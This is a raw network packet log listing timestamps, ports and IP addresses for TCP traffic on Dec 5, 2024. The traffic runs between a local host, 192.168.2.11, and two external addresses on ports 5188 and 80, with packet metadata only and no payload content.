Dec 5, 2024 17:32:14.846471071 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.846697092 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.846736908 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.847615004 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.848011017 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.848105907 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.848789930 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.848965883 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.849024057 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.849867105 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.849978924 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.850035906 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.851152897 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.852045059 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.852088928 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.852170944 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.852411985 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.852575064 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.853307009 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.853399992 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.853579998 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.854391098 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.854419947 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.854468107 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.855573893 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.855603933 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.855684042 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.856669903 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.856739998 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.856784105 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.857889891 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.857980013 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.858058929 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.858974934 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.859041929 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.859131098 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.860097885 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.860183954 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.860229015 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.861218929 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.861305952 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.861351967 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.862396002 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.862514019 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.862585068 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.863521099 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.863651991 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.863709927 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.864675999 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.864758968 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.864836931 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.865792990 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.865953922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.866044044 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.866935968 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.867090940 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.867182016 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.868191004 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.868205070 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.868277073 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.869224072 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.869585991 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.869658947 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.870311022 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.920659065 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.920768023 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.920823097 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.920864105 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.921272039 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.921320915 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.921590090 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.921633959 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.922452927 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.922503948 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.923345089 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.923389912 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.923552036 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.923564911 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.923610926 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.924230099 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.924623966 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.924673080 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.925081015 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.925132990 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.925889015 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.925995111 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.926114082 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.926156044 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.927195072 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.927256107 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.927572012 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.927627087 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.928919077 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.928963900 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.929970980 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.929986954 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.930000067 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.930021048 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.930043936 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.930989027 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.931011915 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.931049109 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.931075096 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.931946039 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.932029963 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.932075024 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.933001995 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.933046103 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.933387041 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.933433056 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.934273005 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.934286118 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.934320927 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.935122013 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.935165882 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.935535908 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.935585022 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.936153889 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.936208963 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.936366081 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.936419010 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.937345982 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.937393904 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.937398911 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.937434912 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.938699007 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.938759089 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.938950062 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.938992977 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.939779997 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.940015078 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.940155983 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.940202951 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.940781116 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.940830946 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.941049099 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.941128969 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.941957951 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.942009926 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.942193985 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.942235947 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.943067074 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.943129063 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.943556070 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.943599939 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.944350004 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.944396019 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.944509029 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.944588900 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.945406914 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.945452929 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.946031094 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.946083069 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.946553946 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.946603060 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.947001934 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.947046995 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.947763920 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.948009968 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.948111057 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.948152065 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.948915005 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.948964119 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.949095011 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.949242115 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.950027943 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.950073004 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.950675011 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.950711012 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.951200008 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.951244116 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.951392889 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.951495886 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.952384949 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.952434063 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.952575922 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.952687979 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.953495979 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.953537941 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.953564882 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.953820944 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.954641104 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.954685926 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.955296993 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.955338001 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.955825090 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.955867052 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.956134081 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.956176996 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.957004070 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.957045078 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.958159924 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.958242893 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.958267927 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.958278894 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.958323002 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.959378958 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.959453106 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.959533930 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.959578037 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.960434914 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.960475922 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.960587025 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.960700989 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.961893082 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.961935997 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.962090969 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.962126970 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.962832928 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.962949038 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.963203907 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.963253975 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.964020967 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.964093924 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.964272976 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.964350939 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.965210915 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.965296030 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.965316057 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.965353966 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.966166973 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.966206074 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.966928959 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.966970921 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.967367887 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.967408895 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.967545986 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.967581034 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.968556881 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.968600035 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.968667030 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.968704939 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.969691038 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.969733000 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.969733953 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.969765902 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.970815897 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.970860958 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.970932007 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.970973015 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.972047091 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.972095013 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.972549915 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.972593069 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.973105907 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.973149061 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.973701954 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.973746061 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.974256039 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.974687099 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.974730968 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.975450993 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.975496054 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.975496054 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.975527048 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.976681948 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.976733923 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.976979017 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.977015972 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.977814913 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.977850914 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.977859974 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.977881908 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.978889942 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.979113102 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.979163885 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.980098009 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.980156898 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.980225086 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.980263948 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.981156111 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.981199980 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.002656937 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.002688885 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.002758026 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.003158092 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.003535032 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.003597021 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.004003048 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.004095078 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.004159927 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.005151033 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.005857944 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.005899906 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.006309032 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.006321907 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.006364107 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.007445097 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.007729053 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.008585930 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.008606911 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.009089947 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.009143114 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.009691954 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.010858059 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.010871887 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.010943890 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.010962009 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.011898994 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.011950016 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.012109041 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.012192965 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.013106108 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.013223886 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.013273954 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.014247894 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.014753103 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.014990091 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.015532970 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.015830040 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.016094923 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.016638994 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.017169952 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.017205954 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.018182993 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.018280983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.018318892 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.018927097 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.018979073 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.019037008 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.019982100 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.020078897 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.021039009 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.021220922 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.021289110 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.021325111 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.022207975 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.022264957 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.022828102 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.023365974 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.023452997 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.023493052 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.024473906 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.024904966 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.025320053 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.025603056 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.026328087 CET	5188	49792	92.255.85.66	192.168.2.11
